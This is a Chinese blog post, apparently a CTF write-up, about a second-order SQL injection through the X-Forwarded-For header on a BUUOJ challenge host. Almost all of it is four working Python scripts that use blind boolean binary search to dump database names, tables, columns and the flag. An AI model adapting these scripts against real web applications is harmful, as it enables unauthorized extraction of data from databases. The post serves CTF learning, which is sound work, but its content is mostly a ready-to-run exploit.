二次注入
昨天的博客没写完,今天补充一下发出去
<!-- Debug Info:
Duration: 0.59636402130127 s
Current Ip: 10.244.80.46 -->
一看到current IP和last IP,就要知道,应该是把我们的IP写刀数据库里了
这样的话 就是修改X-FORWARD-FOR的值进行注入
先输入1,此时我们的current ip就是它,然后我们再次输入currnt ip是2,但是last IP就是1,因为第一次和第二次的IP不一样,所以服务器并不会从数据库找last IP,它会把上次的IP=1直接显示为last IP,然后存入数据库,我们再传一次2,因为和currnet IP相同,那么last IP就会从数据库里寻找,但是也从1里面找了,假如1是一个命令,也就跟着执行了。
爆数据库:
import requests
url = "http://node4.buuoj.cn:25894/"
head = {
"GET" : "/ HTTP/1.1",
"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
"X-Forwarded-For" : ""
}
result = ""
for i in range(1,100):
l = 1
r = 127
mid = (l+r)>>1
while(l<r):
head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i,mid)
html_0 = requests.post(url,headers = head)
head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i, mid+1)
html_0 = requests.post(url, headers=head)
html_0 = requests.post(url, headers=head)
if "Last Ip: 1" in html_0.text:
l= mid+1
else:
r=mid
mid = (l+r)>>1
if(chr(mid)==' '):
break
result+=chr(mid)
print(result)
print("table_name:"+result)
表
import requests
url = "http://node4.buuoj.cn:25894/"
head = {
"GET" : "/ HTTP/1.1",
"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
l = 1
r = 127
mid = (l+r)>>1
while(l<r):
head["X-Forwarded-For"] = urls.format(i,mid)
html_0 = requests.post(url,headers = head)
head["X-Forwarded-For"] = urls.format(i, mid+1)
html_0 = requests.post(url, headers=head)
html_0 = requests.post(url, headers=head)
if "Last Ip: 1" in html_0.text:
l= mid+1
else:
r=mid
mid = (l+r)>>1
if(chr(mid)==' '):
break
result+=chr(mid)
print(result)
print("table_name:"+result)
字段
import requests
url = "http://node4.buuoj.cn:25894/"
head = {
"GET" : "/ HTTP/1.1",
"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
l = 1
r = 127
mid = (l+r)>>1
while(l<r):
head["X-Forwarded-For"] = urls.format(i,mid)
html_0 = requests.post(url,headers = head)
head["X-Forwarded-For"] = urls.format(i, mid+1)
html_0 = requests.post(url, headers=head)
html_0 = requests.post(url, headers=head)
if "Last Ip: 1" in html_0.text:
l= mid+1
else:
r=mid
mid = (l+r)>>1
if(chr(mid)==' '):
break
result+=chr(mid)
print(result)
print("table_name:"+result)
flag
import requests
url = "http://node4.buuoj.cn:25894/"
head = {
"GET" : "/ HTTP/1.1",
"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select F4l9_C01uMn from F4l9_D4t4B45e.F4l9_t4b1e limit 1,1),{0},1))>{1} or '0"
for i in range(1,100):
l = 1
r = 127
mid = (l+r)>>1
while(l<r):
head["X-Forwarded-For"] = urls.format(i,mid)
html_0 = requests.post(url,headers = head)
head["X-Forwarded-For"] = urls.format(i, mid+1)
html_0 = requests.post(url, headers=head)
html_0 = requests.post(url, headers=head)
if "Last Ip: 1" in html_0.text:
l= mid+1
else:
r=mid
mid = (l+r)>>1
if(chr(mid)==' '):
break
result+=chr(mid)
print(result)
print("table_name:"+result)
总结一下,开始我还以为是一个ssrf,到后来发现不对劲,原来是一个注入题,也是经验不足吧。